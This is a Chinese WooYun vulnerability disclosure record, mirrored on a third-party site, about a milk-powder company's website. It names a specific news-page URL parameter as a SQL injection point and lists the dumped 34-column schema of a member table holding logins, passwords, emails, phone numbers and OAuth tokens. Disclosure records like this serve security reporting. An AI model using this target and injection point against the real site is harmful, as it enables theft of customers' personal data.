乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-18: 厂商已经主动忽略漏洞,细节向公众公开
奶粉
http://www.scient.com.cn/news/news.php?id=303
参数id注入点:
Table: member2013[34 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| AddressInfo | varchar(200) || BabyName | varchar(50) || BabyTran | varchar(50) || BirthDay | varchar(50) || CityAddress | varchar(100) || CommandName | varchar(50) || Email | varchar(100) || IP | varchar(50) || IPAddress | varchar(100) || IsAcceptProduct | int(11) || IsActiveEmail | int(11) || IsEnable | int(11) || IsSex | int(11) || LastDate | datetime || LoginName | varchar(100) || LoginPwd | varchar(100) || Member2013ID | int(11) || MemberTypeID | int(11) || Mobile | varchar(50) || NickName | varchar(100) || NowSelPinPai | varchar(50) || OauthToken | varchar(200) || OauthTokenSecre | varchar(200) || ParentName | varchar(50) || Phone | varchar(50) || RegDate | datetime || SelServices | varchar(50) || Tel | varchar(50) || UserCard | varchar(100) || UserName | varchar(100) || WeiboHead | varchar(200) || WeiBoID | varchar(100) || WeiboUrl | varchar(200) || ZipCode | varchar(50) |+-----------------+--------------+
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)